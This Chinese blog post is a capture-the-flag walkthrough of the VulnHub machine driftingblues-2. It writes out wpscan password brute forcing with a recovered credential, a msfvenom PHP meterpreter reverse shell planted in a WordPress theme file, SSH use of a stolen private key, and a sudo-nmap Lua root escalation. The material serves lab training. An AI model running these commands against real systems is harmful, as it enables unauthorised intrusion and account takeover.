关于我渗透driftingblues-2靶机这档事

admin
admin
admin
102359
文章
87
评论
2021年12月31日03:56:03关于我渗透driftingblues-2靶机这档事已关闭评论92 views字数 2058阅读6分51秒阅读模式

vulnhub靶机实战渗透测试->driftingblues-2

环境配置:
靶机下载地址: https://download.vulnhub.com/driftingblues/driftingblues3.ova
靶机IP: 172.16.10.110
攻击机IP: 172.16.10.114

0x00:*信息探测*

*首先得知网卡的MAC地址为:*00:0C:29:EA:1D:91,然后使用arp-scan进行主机发现*
*

关于我渗透driftingblues-2靶机这档事

*发现主机有两个IP,选取其中一个,然后对其进行基本的端口扫描*nmap -sV -p- 172.16.10.110

关于我渗透driftingblues-2靶机这档事

*发现开启了三个端口分别为*21,22,80首先查看21端口是否存在信息泄露*
*

关于我渗透driftingblues-2靶机这档事

*查看存在哪些文件,是否对后续的渗透有帮助

关于我渗透driftingblues-2靶机这档事

*发现有一份jpg的文件,将其传输到攻击机kali上查看图片内容

关于我渗透driftingblues-2靶机这档事

*发现是一个并没有什么用-_-.*

0x01Getshell过程

*然后访问其80端口,并且用dirb进行目录爆破

关于我渗透driftingblues-2靶机这档事

*主页也毫无信息,这个时候来看dirb目录爆破的扫描结果

关于我渗透driftingblues-2靶机这档事

*观察扫描出来的目录,推测这是wordpress框架搭建的blog,访问这个博客的后台登陆,验证猜测*http://172.16.10.110/blog/wp-admin
*这个时候发现,当我们访问这个地址的时候,页面报错

关于我渗透driftingblues-2靶机这档事

*发现IP地址自动变为域名,这个时候我么在hosts文件中配置IP和域名,然后用域名进行访问

关于我渗透driftingblues-2靶机这档事

关于我渗透driftingblues-2靶机这档事

*发现目标靶机确实为wordpress搭建的博客,这个时候不多说,直接上wpscan
*直接用wpscan扫描靶机网站中存在哪些用户*wpscan --url "driftingblues.box/blog/" -e u

关于我渗透driftingblues-2靶机这档事

*扫描到一个用户,然后我准备了两个字典一个是kali自带的rockyou.txt字典,而另一个则是cewl根据网站生成的字典,首先使用rockyou.txt进行爆破
wpscan --url "driftingblues.box/blog" -e u --passwords /usr/share/wordlist/rockyou.txt
*然后在利用cewl生成另一个字典*cewl -d 3 --with-numbers "driftingblues.box/blog" -w passwords.txt
*但是发现那边的rockyou.txt已经将密码爆破出来了

关于我渗透driftingblues-2靶机这档事

wordpress站点账户名和密码:*albert:scotland1*
再用生成出来的字典进行爆破查询是否能够爆破出来*
*

关于我渗透driftingblues-2靶机这档事

*而生成的字典虽然小,但是没有爆破出来,嗯,rockyou.txt yyds!
*然后登陆站点,进入后台尝试getshell

关于我渗透driftingblues-2靶机这档事

*进入后台前台模板编辑的页面,为了方便直接选中index.php界面编辑其代码
*用msfvenom生成反弹的代码*msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.10.114 LPORT=8484 -f raw

关于我渗透driftingblues-2靶机这档事

*将其替换index.php页面中的代码,然后攻击机进入到metasploit渗透测试平台中的handler*

关于我渗透driftingblues-2靶机这档事

关于我渗透driftingblues-2靶机这档事

0x02水平越权

*然后成功的拿到了靶机的shell,进入靶机,尝试进行水平越权
*进入靶机后,查看根目录没有发现有用的文件,然后查找suid的命令也没有发现可以利用的命令

关于我渗透driftingblues-2靶机这档事

*然后进入home目录下,发现还有一个用户*freddie

关于我渗透driftingblues-2靶机这档事

*并且可以进入这个用户的家目录,但是没有写的权限,这个时候发现可以进入.ssh文件,并且还对其中的id_rsa有可读的权限,欸,越权的方法不久拿捏了嘛*

关于我渗透driftingblues-2靶机这档事

*将id_rsa文件的内容复制到攻击机中,然后保存为id_rsa,并且将权限改为400,然后尝试进行ssh免密码登陆*ssh [email protected] -i id_rsa

关于我渗透driftingblues-2靶机这档事

成功的完成水平越权,然后查看目录下的flag文件芜湖!

关于我渗透driftingblues-2靶机这档事

0x03提权

然后查看sudo权限,尝试进行提权root

关于我渗透driftingblues-2靶机这档事

*发现这个用户可以用root权限执行nmap命令,那么提权的方法肯定就是nmap提权
*但是这个nmap的版本较高,并无--interactive参数,那么就尝试另一种提权方式

关于我渗透driftingblues-2靶机这档事

root=$(mktemp)
echo 'os.execute("/bin/bash")' > $root
sudo nmap --script=$root

成功执行完命令之后发现画面不能显示输入的命令,而且变得非常奇怪*
*

关于我渗透driftingblues-2靶机这档事

*这个时候我们输入*reset就可以恢复正常,继而查看我们最终的root.txt**

关于我渗透driftingblues-2靶机这档事

0x04总结

这个靶机还是很简单滴,主要还是wordpress框架的渗透和nmap的提权,那么我们就下一个靶机再见!!!

相关推荐: 将JavaScript隐藏到PNG图片中来绕过CSP

译文来源:https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/。受个人知识所限及偏见影响,部分内容可能存在过度曲解或误解,望师傅们包含并提出建议,感激。 序言 将一个恶意的JavaScrip…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月31日03:56:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   关于我渗透driftingblues-2靶机这档事https://cn-sec.com/archives/692026.html